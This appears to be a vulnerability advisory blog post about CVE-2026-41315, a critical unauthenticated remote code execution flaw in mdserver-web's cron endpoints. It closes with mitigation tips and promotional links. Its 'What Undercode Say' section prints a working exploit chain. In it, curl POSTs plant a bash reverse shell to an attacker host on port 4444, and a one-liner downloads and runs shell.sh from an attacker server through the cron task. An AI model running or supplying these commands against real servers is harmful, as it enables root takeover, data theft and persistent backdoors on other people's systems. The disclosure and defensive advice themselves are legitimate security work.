mdserver-web, Frontend Unauthorized RCE, CVE-2026-41315 (Critical)

Listen to this Post

How the mentioned CVE works (CVE-2026-41315):

The vulnerability exists in mdserver-web versions 0.18.0 through 0.18.4 due to missing authentication on two critical API endpoints: `/modify_crond` and /start_task. An unauthenticated remote attacker can directly send HTTP POST requests to these endpoints. The `/modify_crond` endpoint allows modification of the default built-in scheduled tasks (cron jobs) without any session or token validation. By injecting a malicious command (e.g., a reverse shell or downloader) into an existing crontab entry, the attacker plants the payload. The `/start_task` endpoint then executes the modified scheduled task immediately, bypassing normal cron scheduling. Because the panel runs with root or high privileges (typical for Linux management panels), the injected command executes with those privileges. No CSRF protection or origin checks are present. The attack requires only network access to the panel’s web port (default 8080 or 80). Exploitation can be chained to achieve full remote code execution (RCE) on the server. The vulnerability is front-end in nature but directly manipulates back-end crond service. All default installations from 0.18.0 to 0.18.4 are affected. The vendor has not released a patch as of the NVD publication date (May 14, 2026). Attackers can exploit this blindly by sending crafted JSON payloads to the two endpoints sequentially. Logging may not capture the unauthorized actions because no authentication layer logs the requests.

dailycve form (3 words max per line):

Platform: mdserver web panel
Version: 0.18.0 to 0.18.4
Vulnerability: Unauthenticated RCE crond
Severity: Critical CVSS 9.8
Date: May 27 2026

Prediction: Expected patch June2026

What Undercode Say:

Check if vulnerable endpoint is exposed
curl -X POST http://target:8080/modify_crond \
-H "Content-Type: application/json" \
-d '{"id":"backup","command":"/bin/bash -c \"bash -i >& /dev/tcp/attacker/4444 0>&1\""}'
Trigger the malicious task
curl -X POST http://target:8080/start_task \
-H "Content-Type: application/json" \
-d '{"task_id":"backup"}'
One-liner exploit chain
curl -s -X POST http://target:8080/modify_crond -d '{"id":"logclean","command":"wget http://attacker/shell.sh -O /tmp/x && bash /tmp/x"}' && curl -s -X POST http://target:8080/start_task -d '{"task_id":"logclean"}'

Exploit:

Send two unauthenticated POST requests: first to `/modify_crond` overwriting any default crond entry (e.g., “backup” or “logclean”) with a system command, then to `/start_task` with the same task ID to execute it immediately. No authentication tokens or CSRF required.

Protection from this CVE:

  • Upgrade to mdserver-web >0.18.4 once patch released.
  • Block public access to `/modify_crond` and `/start_task` via reverse proxy or WAF rules.
  • Add HTTP basic auth in front of the web panel.
  • Monitor crond modifications via auditd (auditctl -w /etc/crontab -p wa).

Impact:

Full remote code execution with privileges of the mdserver-web process (typically root). Attacker gains persistent backdoor via cron, can pivot internally, exfiltrate data, or ransomware the server. Confidentiality, integrity, and availability are completely compromised.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top